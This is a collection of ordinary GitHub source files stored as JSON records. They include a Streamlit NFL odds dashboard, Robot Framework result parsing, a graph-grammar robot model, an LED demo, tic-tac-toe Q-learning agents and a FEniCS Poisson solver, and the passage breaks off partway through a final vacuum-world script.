+{"seq_id":"35067254620","text":"\"\"\"\nRun streamlit app to visualize games and odds\n\"\"\"\n\n\nfrom google.cloud import bigquery\nimport sys\nimport os\nimport pandas as pd\nimport streamlit\nimport plotly.express as px\nimport datetime\n\nsys.path.append(os.path.join(os.path.dirname(__file__), '../'))\nfrom app.config.config import gcp_service_accnt # noqa: E402\n\nbq = bigquery.Client(credentials=gcp_service_accnt)\n\nproject = 'odds-tracker-402301'\ndataset_id = 'nfl_data'\nodds_table = 'daily_odds_data'\nmetadata_table = 'game_metadata'\nscore_table = 'game_results'\n\n\n@streamlit.cache_data(ttl=6000)\ndef run_query(query: str) -> pd.DataFrame:\n return bq.query(query).to_dataframe()\n\n\nwith open('sql_scripts/bets_and_games.sql') as f:\n bets_query = f.read()\n\nwith open('sql_scripts/game_results.sql') as f:\n score_query = f.read()\n\n\n# run queries and cache results\n\nbets = run_query(bets_query)\nbets['matchup'] = bets['home_team'] + ' vs. 
' + bets['away_team']\n# bets[['update_date', 'game_date']] = bets[['update_date', 'game_date']]\\\n#     .apply(pd.to_datetime, axis=1)\nbets['is_upcoming'] = bets['game_date'] >= datetime.datetime.now().date()\n\n\ngame_results = run_query(score_query)\ngame_results['first_half_score_home'] = game_results['home_score_q1'] + \\\n    game_results['home_score_q2']\ngame_results['first_half_score_away'] = game_results['away_score_q1'] + \\\n    game_results['away_score_q2']\n\n\n# define filters for game date, bet type, match up,\n# home or away team and if the game is upcoming or completed\n\nstreamlit.title('NFL Betting Odds Tracker')\n\nbet_name_filter = streamlit.multiselect('Select bet type',\n                                        options=list(\n                                            bets['bet_name'].unique()),\n                                        default=list(bets['bet_name'].unique())\n                                        )\n\nmatchup_filter = streamlit.multiselect('Select matchup',\n                                       options=list(bets['matchup'].unique()),\n                                       default=list(bets['matchup'].unique())\n                                       )\n\ngame_date_filter = streamlit.multiselect('Select game date',\n                                         options=list(\n                                             bets['game_date'].unique()),\n                                         default=list(\n                                             bets['game_date'].unique())\n                                         )\n\nupcoming_filter = streamlit.multiselect('Select upcoming games',\n                                        options=[True, False],\n                                        default=[True, False]\n                                        )\n\nfiltered_data = bets.loc[(bets['bet_name'].isin(bet_name_filter)) &\n                         (bets['matchup'].isin(matchup_filter)) &\n                         (bets['game_date'].isin(game_date_filter)) &\n                         (bets['is_upcoming'].isin(upcoming_filter)), :]\n\n\n# Define a few charts\nfig = px.scatter(\n    filtered_data,\n    x='update_date',\n    y='odd',\n    color='bet_subgroup',\n    # text='matchup',\n    facet_col='bet_name',\n    facet_col_wrap=2,\n    labels={'odd': 'Decimal Odds',\n            'update_date': 'Datetime',\n            'bet_subgroup': 'Bet Outcome'\n            }\n)\\\n    .update_yaxes(matches=None)\\\n    .for_each_yaxis(lambda yaxis: yaxis.update(showticklabels=True))\\\n    .for_each_annotation(lambda a: a.update(text=a.text.split(\"=\")[-1]))\n\n\n# define plots in streamlit\ntab1, tab2, tab3 = streamlit.tabs(\n    ['Betting lines for matchups', 'Line Table', 'Scores from previous games'])\n\nwith tab1:\n    streamlit.plotly_chart(fig, theme='streamlit')\n\nwith tab2:\n    cols = ['value', 'odd', 'bet_subgroup', 'subgroup_value', 'bet_name',\n            'update_date', 'game_date', 'week', 'home_team', 'away_team']\n    streamlit.write(filtered_data.loc[:, cols])\n\nwith tab3:\n    cols = ['week', 'game_date', 'city', 'home_team',\n            'away_team', 'first_half_score_home',\n            'first_half_score_away', 'home_score_final', 'away_score_final']\n    streamlit.write(game_results.loc[:, cols])\n\n    # streamlit.plotly_chart(fig2, theme='streamlit')\n","repo_name":"Matt-J-Christy/sports-betting-odds-tracker","sub_path":"streamlit/streamlit_app.py","file_name":"streamlit_app.py","file_ext":"py","file_size_in_byte":4171,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
+{"seq_id":"3800346278","text":"# import xml.etree.ElementTree as ET\nfrom lxml import etree\n# import sys\nresource_path = \"public/output.xml\"\nexpect_suite = [\"HP888\", \"SCR\"]\n\n### Xpath\ntest_id_xpath = \".//tag[starts-with(.,'DQP')]\"\nid_prefix_xpath = \".//tag[starts-with(.,'<prefix>')]\"\nsuite_and_test_id_xpath = \"//suite[@name = '<suite>']//tag[contains(.,'<id>')]\"\nstart_time_xpath = \"/..//status/@starttime\"\ntest_result_xpath = \"/..//status[contains(@starttime,'<time>')]/@status\"\nall_test_xpath = \".//stat[contains(.,'All Tests')]\"\nduration_xpath = \".//status/@elapsedtime\"\n\n\n\ndef getAllTestIdFromPrefix(xml_url, prefix):\n    report_file = open(xml_url, 'r')\n    tree = etree.parse(report_file)\n    
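# The XPath templates above carry angle-bracket placeholders (e.g. '<prefix>',\n    # '<suite>', '<id>', '<time>') that are swapped for concrete values below.\n    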
formatted_xpath = id_prefix_xpath.replace(\"<prefix>\", prefix)\n    id_list = tree.xpath(formatted_xpath)\n    return id_list\n\ndef getAllTestResult(xml_url):\n    report_file = open(xml_url, 'r')\n    tree = etree.parse(report_file)\n    all_test_result = tree.xpath(all_test_xpath)\n    result_dict = all_test_result[0].attrib\n    return result_dict\n\ndef getTestDuration(xml_url):\n    report_file = open(xml_url, 'r')\n    tree = etree.parse(report_file)\n    elapsed_time = tree.xpath(duration_xpath)\n    millis = int(elapsed_time[0])\n    seconds=(millis/1000)%60\n    minutes=(millis/(1000*60))%60\n    hours=(millis/(1000*60*60))%24\n    return {'seconds': str(int(seconds)), 'minutes': str(int(minutes)), 'hours': str(int(hours))}\n    \ndef getAllTestResultFromId(xml_url, suite, id_list):\n    \n    report_file = open(xml_url, 'r')\n    tree = etree.parse(report_file)\n    \n    suite_result = {}\n    for suite_name in suite:\n        # print(suite_name)\n        id_result = {}\n        for test_id in id_list:\n            \n            time_xpath = suite_and_test_id_xpath+start_time_xpath\n            expected_xpath = time_xpath.replace(\"<suite>\",suite_name)\n            expected_xpath = expected_xpath.replace(\"<id>\",test_id.text)\n            # print(expected_xpath)\n            list_test_case = tree.xpath(expected_xpath)\n            # print(list_test_case)\n            \n            if len(list_test_case):\n                full_result_xpath = suite_and_test_id_xpath+test_result_xpath\n                result_xpath = full_result_xpath.replace(\"<suite>\",suite_name)\n                result_xpath = result_xpath.replace(\"<id>\",test_id.text)\n                result_xpath = result_xpath.replace(\"<time>\",list_test_case[-1]) ### last one\n                # print(result_xpath)\n                test_result = tree.xpath(result_xpath)\n                # print(test_result)\n                print(str(test_id.text)+ \" \" + str(test_result[0]))\n                # print(list_test_case[0].text)\n                id_result[test_id.text]=str(test_result[0])\n        suite_result[suite_name]=id_result\n    return suite_result\n\n# id_list = getAllTestIdFromPrefix(resource_path, \"DQP\")\n# test_status = getAllTestResultFromId(resource_path, expect_suite, id_list)\n# key_list = list(test_status) ## how to get the list of a dictionary's keys\n# print(test_status)\n# print(key_list)\n\n# print(getAllTestResult(resource_path))\n# print(getTestDuration(resource_path))","repo_name":"Bond-z/robot_framework","sub_path":"PythonFunction/TestResultUpdate.py","file_name":"TestResultUpdate.py","file_ext":"py","file_size_in_byte":3135,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
+{"seq_id":"23055447073","text":"from __future__ import annotations\nimport enum\nimport dataclasses\nfrom copy import deepcopy\nfrom typing import Optional, Sequence\nimport random\nfrom xml_parser import XMLModel, Body, geoms, joints\nfrom utils import Transform\nfrom grammars import transforms\nimport pydot\nimport numpy as np\nfrom scipy.spatial.transform import Rotation\n\n\n@dataclasses.dataclass\nclass NodeData():\n    symbol: int\n    geom: Sequence[Optional[geoms.Geom]] = None\n\n\n@dataclasses.dataclass\nclass EdgeData():\n    symbol: int\n    transform: Optional[callable] = None\n    joint: Sequence[Optional[joints.Joint]] = None\n    mirror_x: bool = False\n    mirror_y: bool = False\n    mirror_z: bool = False\n    mirror_first: bool = True\n\n    def update(self, data: EdgeData):\n        self.symbol = data.symbol\n        if data.transform is not None:\n            self.transform = transforms.compose(data.transform, self.transform)\n        if data.joint is not None:\n            self.joint = data.joint\n\n\nclass Tree():\n    def __init__(self):\n        self.nodes = {}\n        self.edges = {}\n        self.parents = {}\n        self._n = 0\n        self.root = 0\n\n    def add_node(self, node: NodeData):\n        self.nodes[self._n] = node\n        self.edges[self._n] = {}\n        self._n += 1\n        return self._n - 1
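\n\n    # A minimal usage sketch (hypothetical symbol values):\n    #   t = Tree()\n    #   root = t.add_node(NodeData(symbol=0))\n    #   child = t.add_node(NodeData(symbol=1))\n    #   t.add_edge(root, child, EdgeData(symbol=0))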
\n\n    def add_edge(self, parent: int, child: int, edge: EdgeData):\n        self.edges[parent][child] = edge\n        self.parents[child] = parent\n\n    def insert_subtree(self, node: int, tree: Tree):\n        if len(tree.nodes) == 0: # Delete node (i.e. replace it with an empty subtree)\n            if node == 0:\n                raise ValueError(\"The root node cannot be deleted.\")\n            del self.nodes[node]\n            del self.edges[node]\n            del self.edges[self.parents[node]][node]\n\n        else: # Replace node with subtree\n            self.nodes[node] = tree.nodes[tree.root]\n\n            index_map = {}\n            for ind, data in tree.nodes.items():\n                if ind == 0:\n                    self.nodes[node] = tree.nodes[0]\n                    index_map[0] = node\n                else:\n                    index_map[ind] = self.add_node(data)\n\n            for parent, edges in tree.edges.items():\n                for child, edge in edges.items():\n                    self.add_edge(index_map[parent], index_map[child], edge)\n\n    def get_node_data(self, ind: int):\n        return self.nodes[ind]\n\n    def get_children(self, node_ind: int):\n        return self.edges[node_ind]\n\n    def to_networkx(self):\n        import networkx as nx\n        g = nx.DiGraph()\n        for i, node in self.nodes.items():\n            g.add_node(i, symbol=node.symbol)\n            for child in self.edges[i]:\n                g.add_edge(i, child)\n        return g\n\n    def visualize(self):\n        from matplotlib import pyplot as plt\n        import networkx as nx\n        plt.clf()\n        graph = self.to_networkx()\n        labels = {i: str(n.symbol.name) for i, n in self.nodes.items()}\n        nx.draw(graph, with_labels=True, font_weight='bold', labels=labels)\n        plt.show()\n\n\nclass Rule():\n    pass\n\n@dataclasses.dataclass\nclass NodeExpansion(Rule):\n    symbol: str\n    graph: Tree\n    description: str\n\n    def apply(self, graph: Tree, node_ind: int):\n        node = graph.nodes[node_ind]\n        if node.symbol != self.symbol:\n            raise ValueError(f'Tried to apply a rule acting on symbol {self.symbol.name} to a '\n                             f'node with symbol {node.symbol.name}')\n        graph.insert_subtree(node_ind, deepcopy(self.graph))\n\n    def __repr__(self):\n        return f'Rule({self.description})'\n\n\n@dataclasses.dataclass\nclass EdgeExpansion(Rule):\n    symbol: str\n    edge: EdgeData\n    description: str\n\n    def apply(self, graph: Tree, parent: int, child: int):\n        edge = graph.edges[parent][child]\n        if edge.symbol != self.symbol:\n            raise ValueError(f'Tried to apply a rule acting on {self.symbol} to a node with symbol'\n                             f' {edge.symbol}')\n\n        edge.update(self.edge)\n\n    def __repr__(self):\n        return f'Rule({self.description})'\n\n\nclass SymbolSet(enum.IntEnum):\n    pass\n\n\nclass RuleSet():\n    def __init__(self):\n        self._rules_by_symbol = {}\n        self._rules_by_id = {}\n        self._id_by_symbol = {}\n        self.non_terminals = set([])\n\n    def add_rule(self, rule: Rule):\n        if rule.symbol not in self._rules_by_symbol:\n            self.non_terminals.add(rule.symbol)\n            self._rules_by_symbol[rule.symbol] = []\n            self._id_by_symbol[rule.symbol] = []\n        self._rules_by_symbol[rule.symbol].append(rule)\n        count = self.nrules\n        self._rules_by_id[count] = rule\n        self._id_by_symbol[rule.symbol].append(count)\n\n    def get_rule_by_id(self, ind: int):\n        return self._rules_by_id[ind]\n\n    def get_rules_by_symbol(self, symbol: int):\n        if symbol in self._rules_by_symbol:\n            return self._rules_by_symbol[symbol]\n        else:\n            return []\n\n    def get_ids_by_symbol(self, symbol: int):\n        if symbol in self._id_by_symbol:\n            return self._id_by_symbol[symbol]\n        else:\n            return []\n\n    @property\n    def nrules(self):\n        return len(self._rules_by_id)\n\n    def __getitem__(self, symbol: int):\n        return self.get_rules_by_symbol(symbol)\n\n\nclass Grammar():\n    def __init__(self, symbols: SymbolSet, rules: RuleSet, initial_graph: Tree):\n        
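# A grammar couples a symbol alphabet, a rule set, and the axiom graph that\n        # every derivation starts from (deep-copied by initialize_graph).\n        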
self._initial_graph = initial_graph\n self.symbols = symbols\n self.rules = rules\n\n def initialize_graph(self):\n return deepcopy(self._initial_graph)\n\n def get_valid_expansions(self, graph: Tree):\n valid_rules = {}\n for i, node in graph.nodes.items():\n valid_rules[i] = self.rules[node.symbol]\n for parent, children in graph.edges.items():\n for child, edge in children.items():\n valid_rules[(parent, child)] = self.rules[edge.symbol]\n return valid_rules\n\n def contains_non_terminal_symbols(self, graph: Tree):\n for node in graph.nodes.values():\n if node.symbol in self.rules.non_terminals:\n return True\n for children in graph.edges.values():\n for edge in children.values():\n if edge.symbol in self.rules.non_terminals:\n return True\n return False\n\n def get_non_terminal_nodes(self, graph: Tree):\n inds = []\n for i, node in graph.nodes.items():\n if node.symbol in self.rules.non_terminals:\n inds.append(i)\n return inds\n\n def get_non_terminal_edges(self, graph: Tree):\n edges = []\n for parent, children in graph.edges.items():\n for child, edge in children.items():\n if edge.symbol in self.rules.non_terminals:\n edges.append((parent, child))\n return edges\n\n def get_non_terminals(self, graph: Tree):\n return self.get_non_terminal_nodes(graph) + self.get_non_terminal_edges(graph)\n\n def sample(self):\n g = self.initialize_graph()\n while self.contains_non_terminal_symbols(g):\n valid_rules = self.get_valid_expansions(g)\n ind = random.choice(self.get_non_terminals(g))\n rule = random.choice(valid_rules[ind])\n if isinstance(ind, tuple):\n rule.apply(g, *ind)\n else:\n rule.apply(g, ind)\n return g\n\n def to_xml(self, graph: Tree, filename: str = None):\n if self.contains_non_terminal_symbols(graph):\n raise ValueError('Input graph must contain only terminal symbols in order '\n 'to generate an xml file.')\n xml = to_xml(graph)\n if filename is not None:\n xml.write(filename)\n return xml\n\n\ndef to_xml(graph: Tree):\n xml = XMLModel()\n root = xml.root\n\n default_transform = transforms.apply(Transform()) # identity\n\n class MirrorContext():\n def __init__(self):\n self.mirror_axes = []\n self.is_first = False\n\n def add_mirror(self, axis: int, mirror_first=True):\n self.mirror_axes.append(axis)\n self.is_first = True\n self.mirror_first = mirror_first\n return self\n\n def adjust_geom(self, geom: Sequence[geoms.Geom]):\n out = []\n for g in geom:\n for ax in reversed(self.mirror_axes):\n if self.is_first and not self.mirror_first:\n continue\n else:\n g = g.mirror(ax)\n out.append(g)\n self.is_first = False\n return out\n\n def adjust_joint(self, joint: Sequence[joints.Joint]):\n out = []\n for j in joint:\n for ax in reversed(self.mirror_axes):\n j = j.mirror(ax)\n out.append(j)\n return out\n\n def adjust_transform(self, t: Transform):\n axis_angle = Rotation.from_quat(t.quat).as_rotvec()\n if np.allclose(axis_angle, 0.):\n return t\n for ax in reversed(self.mirror_axes):\n for ind in range(3):\n if ind != ax:\n axis_angle[ind] *= -1\n return Transform(t.pos, Rotation.from_rotvec(axis_angle).as_quat())\n\n def __enter__(self):\n return self\n\n def __exit__(self, type, value, traceback):\n self.mirror_axes.pop()\n\n mirror = MirrorContext()\n\n\n def add_child_body(body, child_ind, geom, edge):\n transform = default_transform if edge.transform is None else edge.transform\n t = transform(mirror.adjust_geom(geom))\n t = mirror.adjust_transform(t)\n child_body = body.add_body(pos=t.pos, quat=t.quat)\n for j in mirror.adjust_joint(edge.joint):\n if not isinstance(j, 
joints.RigidJoint):\n child_body.add_joint(j)\n depth_first_traversal(child_ind, child_body)\n\n\n def depth_first_traversal(node_ind: int, body: Body):\n node = graph.nodes[node_ind]\n gs = mirror.adjust_geom(node.geom)\n for g in gs:\n body.add_geom(g)\n for child_ind, edge in graph.edges[node_ind].items():\n if edge.joint is None:\n raise ValueError(\"All edges must specify a joint to connect bodies.\")\n\n add_child_body(body, child_ind, node.geom, edge)\n if edge.mirror_x:\n with mirror.add_mirror(0, edge.mirror_first):\n add_child_body(body, child_ind, node.geom, edge)\n if edge.mirror_y:\n with mirror.add_mirror(1, edge.mirror_first):\n add_child_body(body, child_ind, node.geom, edge)\n if edge.mirror_z:\n with mirror.add_mirror(2, edge.mirror_first):\n add_child_body(body, child_ind, node.geom, edge)\n\n depth_first_traversal(0, root)\n xml.adjust_root()\n return xml\n","repo_name":"cbschaff/nlimb2","sub_path":"packages/grammars/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":11066,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"19"} +{"seq_id":"4584325348","text":"dodo = 'Os atributos dos monstros vao ser inteligencia, sabedoria...'\nleo = \"Iron Maiden's gonna get you, no matter how far!\"\npepper = 'Urano perdeu algo muito precioso...'\nempate = 'Putz vei, o Leo ta demorando muito pra jogar...'\nmsgs = {'dodo': dodo, 'leo': leo, 'pepper': pepper}\n\ndef jogo(j1, j2, j3):\n jogo_dict = {'pedra': 'tesoura', 'papel': 'pedra', 'tesoura': 'papel'}\n vencedores = []\n jogadas = [j1, j2, j3]\n jogadores = ['dodo', 'leo', 'pepper']\n for i, jogada1 in enumerate(jogadas):\n jogadas_restantes = jogadas.copy()\n del jogadas_restantes[i]\n for jogada2 in jogadas_restantes:\n if jogo_dict[jogada1] == jogada2:\n vencedores.append(jogadores[i])\n return list(set(vencedores))\n\nwhile True:\n try:\n d, l, p = [i for i in input().split()]\n resultado = jogo(d, l, p)\n if len(resultado) == 0 or len(resultado) > 1:\n print(empate)\n else:\n print(msgs[resultado[0]])\n except EOFError:\n break\n","repo_name":"jpsalviano/uri-online-judge","sub_path":"2626.py","file_name":"2626.py","file_ext":"py","file_size_in_byte":1028,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"71416403564","text":"#!/usr/bin/env python3\n\nimport time\nfrom trilobot import Trilobot\n\n\"\"\"\nThis example will demonstrate the RGB underlights of Trilobot,\nby making them flash in a red, green and blue sequence.\n\"\"\"\nprint(\"Trilobot Example: Flash Underlights\\n\")\n\nRED = (255, 0, 0)\nGREEN = (0, 255, 0)\nBLUE = (0, 0, 255)\n\n# LED flashing variables\nled_state = False\nflash_interval = 0.5 # in seconds\n\nLOOPS = 10 # How many times to play the LED animation\ninterval = 0.5 # Control the speed of the LED animation\n\ntbot = Trilobot()\n\nlast_time = time.time()\n\nled = False\n\nwhile True:\n print(last_time, led)\n current_time = time.time()\n print(current_time - last_time)\n\n # If enough time has passed since the last change, consider it stable\n if(current_time - last_time) >= interval:\n if led == True:\n tbot.clear_underlighting()\n led = False\n print(\"OFF\")\n last_time = time.time()\n else:\n tbot.fill_underlighting(RED)\n led = True\n print(\"ON\")\n last_time = 
time.time()","repo_name":"LCAS/ROB1002","sub_path":"scripts/flash_underlights_v2.py","file_name":"flash_underlights_v2.py","file_ext":"py","file_size_in_byte":1060,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"16005352332","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\n\nfrom Game import *\n\n\n# ## Rules of the Game\n\n# In[2]:\n\n\ndef initial_state():\n board=Board(3,3)\n board.pieces=['.','X','O']\n return board\n\ndef show_state(state):\n print(state)\n \ndef valid_moves(state,player): # returns a list of all of the possible moves given a state\n moves=[]\n \n for i in range(9):\n if state[i]==0:\n moves.append(i)\n \n return moves\n \ndef update_state(state,player,move):\n \n new_state=state\n state[move]=player\n \n return new_state\n\ndef win_status(state,player):\n # \"win\" if the player wins\n # \"lose\" if the player loses\n # \"stalemate\" if a tie\n # None if the game continues\n \n # 0 1 2\n # 3 4 5\n # 6 7 8\n \n if state[0]==player and state[1]==player and state[2]==player:\n return \"win\"\n if state[3]==player and state[4]==player and state[5]==player:\n return \"win\"\n if state[6]==player and state[7]==player and state[8]==player:\n return \"win\"\n if state[0]==player and state[3]==player and state[6]==player:\n return \"win\"\n if state[1]==player and state[4]==player and state[7]==player:\n return \"win\"\n if state[2]==player and state[5]==player and state[8]==player:\n return \"win\"\n if state[0]==player and state[4]==player and state[8]==player:\n return \"win\"\n if state[6]==player and state[4]==player and state[2]==player:\n return \"win\"\n \n if player==1:\n other_player=2\n else:\n other_player=1\n \n \n if not valid_moves(state,other_player):\n return \"stalemate\"\n \n \n return None\n \n\n\n# ## Agents\n\n# In[3]:\n\n\ndef human_move(state,player):\n print(\"\"\"\n 0 1 2\n 3 4 5\n 6 7 8\n \"\"\")\n \n move=int(input(\"What move?\"))\n \n return move\n\nhuman_agent=Agent(human_move)\n\n\n# In[4]:\n\n\ndef random_move(state,player):\n possible_moves=valid_moves(state,player)\n move=random.choice(possible_moves)\n return move\n\n\nrandom_agent=Agent(random_move)\n\n\n# In[12]:\n\n\nfrom Game.minimax import *\ndef minimax_move(state,player):\n\n values,moves=minimax_values(state,player,display=False)\n return top_choice(moves,values)\n\n\nminimax_agent=Agent(minimax_move)\n\n\n# In[6]:\n\n\ndef skittles_move(state,player,info):\n S=info.S\n last_action=info.last_action\n last_state=info.last_state\n \n \n # if Ive never seen this state before\n if not state in S:\n actions=valid_moves(state,player)\n\n S[state]=Table()\n for action in actions:\n S[state][action]=3 \n \n move=weighted_choice(S[state]) # weighted across actions\n \n # what if there are no skittles for a particular state?\n # move is None in that case\n \n if move is None:\n # learn a little bit\n if last_state:\n S[last_state][last_action]=S[last_state][last_action]-1\n if S[last_state][last_action]<0:\n S[last_state][last_action]=0\n \n move=random_move(state,player)\n \n return move\n\ndef skittles_after(status,player,info):\n S=info.S\n last_action=info.last_action\n last_state=info.last_state\n\n if status=='lose':\n # learn a little bit\n S[last_state][last_action]=S[last_state][last_action]-1\n if S[last_state][last_action]<0:\n S[last_state][last_action]=0\n \n 
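\n# The skittles agents learn in the spirit of Michie's MENACE matchboxes: each\n# state keeps a bead count per legal move, moves are drawn in proportion to\n# those counts, and a losing line of play has a bead removed (floored at 0).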
\n\n\nskittles_agent=Agent(skittles_move)\nskittles_agent.S=Table()\nskittles_agent.post=skittles_after\n\n\nskittles_agent2=Agent(skittles_move)\nskittles_agent2.S=Table()\nskittles_agent2.post=skittles_after\n\n\n# In[7]:\n\n\ndef Q_move(state,player,info):\n    Q=info.Q\n    last_action=info.last_action\n    last_state=info.last_state\n    \n    α=info.α\n    γ=info.γ\n    ϵ=info.ϵ\n    \n\n    # if Ive never seen this state before\n    if not state in Q:\n        actions=valid_moves(state,player)\n\n        Q[state]=Table()\n        for action in actions:\n            Q[state][action]=0 \n    \n    # deal with random vs top choice here\n    if random.random()<ϵ:\n        move=random_move(state,player) \n    else:\n        move=top_choice(Q[state]) \n    \n    # what if there are no skittles for a particular state?\n    # move is None in that case\n    \n    if not last_action is None: # not the first move\n        # learn a little bit\n        # change equation here\n        reward=0\n        \n        # Bellman equation\n        Q[last_state][last_action] += α*(reward+\n                γ*max([Q[state][a] for a in Q[state]]) - \n                Q[last_state][last_action])\n    \n    \n    \n    return move\n\ndef Q_after(status,player,info):\n    Q=info.Q\n    last_action=info.last_action\n    last_state=info.last_state\n\n    α=info.α\n    γ=info.γ\n    ϵ=info.ϵ\n    \n    if status=='lose':\n        reward=-1\n    elif status=='win':\n        reward=1\n    elif status=='stalemate':\n        reward=0.5\n    else:\n        reward=0\n    \n    # learn a little bit\n    Q[last_state][last_action] += α*(reward-Q[last_state][last_action])\n    \n\n\n# In[15]:\n\n\nQ1_agent=Agent(Q_move)\nQ1_agent.Q=LoadTable('Q1_TTT_data.json')\nQ1_agent.post=Q_after\n\nQ1_agent.α=0.3 # learning rate\nQ1_agent.γ=0.9 # memory constant, discount factor\nQ1_agent.ϵ=0.1 # probability of a random move during learning\n\nQ2_agent=Agent(Q_move)\nQ2_agent.Q=LoadTable('Q2_TTT_data.json')\nQ2_agent.post=Q_after\n\nQ2_agent.α=0.3 # learning rate\nQ2_agent.γ=0.9 # memory constant, discount factor\nQ2_agent.ϵ=0.1 # probability of a random move during learning\n\n\n# In[23]:\n\n\ntotal_number_of_games=0\nfor epoch in range(100):\n    \n    number_training_games=1000\n    number_of_testing_games=10\n    \n    #=================\n    # training cycle\n    Q1_agent.α=0.3 # learning rate\n    Q1_agent.ϵ=0.1 # probability of a random move during learning\n    Q2_agent.α=0.3 # learning rate\n    Q2_agent.ϵ=0.1 # probability of a random move during learning\n    \n    g=Game(number_training_games)\n    g.display=False\n    g.run(Q1_agent,Q2_agent)\n\n    #=================\n    # testing cycle\n    Q1_agent.α=0.0 # learning rate\n    Q1_agent.ϵ=0.0 # probability of a random move during learning\n    Q2_agent.α=0.0 # learning rate\n    Q2_agent.ϵ=0.0 # probability of a random move during learning\n    \n    \n    g=Game(number_of_testing_games)\n    g.display=False\n    result=g.run(Q1_agent,Q2_agent)\n    \n    total_number_of_games+=number_training_games\n    win_percentage=sum([r==1 for r in result])/number_of_testing_games*100\n    loss_percentage=sum([r==2 for r in result])/number_of_testing_games*100\n    tie_percentage=sum([r==0 for r in result])/number_of_testing_games*100\n\n    print(total_number_of_games,\":\",win_percentage,\" \",end=\"\")\n    \n    SaveTable(Q1_agent.Q,'Q1_TTT_data.json')\n    SaveTable(Q2_agent.Q,'Q2_TTT_data.json') \n    \n\n\n# In[24]:\n\n\ng=Game(number_of_testing_games)\ng.display=False\nresult=g.run(minimax_agent,Q2_agent)\n\n\n# In[25]:\n\n\ng.report()\n\n\n# In[26]:\n\n\ng=Game(number_of_testing_games)\ng.display=False\nresult=g.run(Q1_agent,minimax_agent)\n\n\n# In[27]:\n\n\ng.report()\n\n\n# ## After 100,000 games, \n# \n# 1. ties 100% with minimax\n# 2. I defeated it with the game below:\n# \n# Game 1\n# . . . \n# . . . \n# . . . 
\n# \n# \n# 0 1 2\n# 3 4 5\n# 6 7 8\n# \n# What move? 4\n# Player 1 moves 4\n# . . . \n# . X . \n# . . . \n# \n# Player 2 moves 0\n# O . . \n# . X . \n# . . . \n# \n# \n# 0 1 2\n# 3 4 5\n# 6 7 8\n# \n# What move? 1\n# Player 1 moves 1\n# O X . \n# . X . \n# . . . \n# \n# Player 2 moves 7\n# O X . \n# . X . \n# . O . \n# \n# \n# 0 1 2\n# 3 4 5\n# 6 7 8\n# \n# What move? 6\n# Player 1 moves 6\n# O X . \n# . X . \n# X O . \n# \n# Player 2 moves 3\n# O X . \n# O X . \n# X O . \n# \n# \n# 0 1 2\n# 3 4 5\n# 6 7 8\n# \n# What move? 2\n# Player 1 moves 2\n# O X X \n# O X . \n# X O . \n# \n# Player 1 won.\n\n# In[28]:\n\n\ng=Game(1)\nresult=g.run(human_agent,Q2_agent)\n\n\n# In[ ]:\n\n\n\n\n","repo_name":"kdoorley/AI-and-Robotics-Fall-2020-Class-Notebooks","sub_path":"Sprint #2 - Learning and Simulation/2020-09-14 - TTT Q Learning Minimax and Skittles.py","file_name":"2020-09-14 - TTT Q Learning Minimax and Skittles.py","file_ext":"py","file_size_in_byte":8142,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"22905393323","text":"\"\"\"\nFEniCS tutorial demo program: Poisson equation with Dirichlet conditions.\nTest problem is chosen to give an exact solution at all nodes of the mesh.\n -Laplace(u) = f in the unit square\n u = u_D on the boundary\n u_D = 1 + x^2 + 2y^2\n f = -6\n\"\"\"\n\nfrom __future__ import print_function\nfrom fenics import *\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits import mplot3d\n\n# Create mesh and define function space\nmesh = UnitSquareMesh(8, 8)\nV = FunctionSpace(mesh, 'P', 1)\n\n# Define boundary condition\nu_D = Expression('1 + x[0]*x[0] + 2*x[1]*x[1]', degree=2)\n\ndef boundary(x, on_boundary):\n return on_boundary\n\nbc = DirichletBC(V, u_D, boundary)\n\n# Define variational problem\nu = TrialFunction(V)\nv = TestFunction(V)\nf = Constant(-6.0)\na = dot(grad(u), grad(v))*dx\nL = f*v*dx\n\n# Compute solution\nu = Function(V)\nsolve(a == L, u, bc)\n\n# Plot solution and mesh\nfig = plt.figure()\nfig.show()\nfig.clear()\nax = fig.add_subplot(121,projection='3d')\np = plot(u,mode=\"warp\", title='Temperature Field (axes dimension in mm)')\n#m = plot(mesh)\n#fig.gca().set_zlim((0, 2))\nax.set(title='Poisson Equation')\nfig.colorbar(p)\n#ax.clear()\nax2 = fig.add_subplot(122)\nax2.plot([1,2,3],[1,3,4])\nfig.canvas.draw()\n\n# Save solution to file in VTK format\n# vtkfile = File('poisson/solution.pvd')\n# vtkfile << u\n\n# Compute error in L2 norm\n# error_L2 = errornorm(u_D, u, 'L2')\n\n# Compute maximum error at vertices\nvertex_values_u_D = u_D.compute_vertex_values(mesh)\nvertex_values_u = u.compute_vertex_values(mesh)\nimport numpy as np\n# error_max = np.max(np.abs(vertex_values_u_D - vertex_values_u))\n\n# Print errors\n# print('error_L2 =', error_L2)\n# print('error_max =', error_max)\n\n'''mshco = mesh.coordinates()\nx = mshco[:,0]\ny = mshco[:,1]\nfig = plt.figure()\nax = fig.add_subplot(1,1,1,projection = '3d')\nsca = ax.plot_trisurf(x,y,vertex_values_u,cmap=plt.cm.jet)\n'''\n# Hold plot\nplt.show()","repo_name":"Madhav-Joshi/Fenics_Project","sub_path":"fenics_trial/poisson_eq.py","file_name":"poisson_eq.py","file_ext":"py","file_size_in_byte":1894,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"10356099638","text":"from random import randint\n\nvet_estado = ['limpo', 'sujo']\n\nordem = int(input(\"Entre com a ordem da matriz: \\n\"))\n\nposicao_sala = [i for i in range(0, ordem*ordem)]\nprint(posicao_sala)\n\nmat = []\nfor i in 
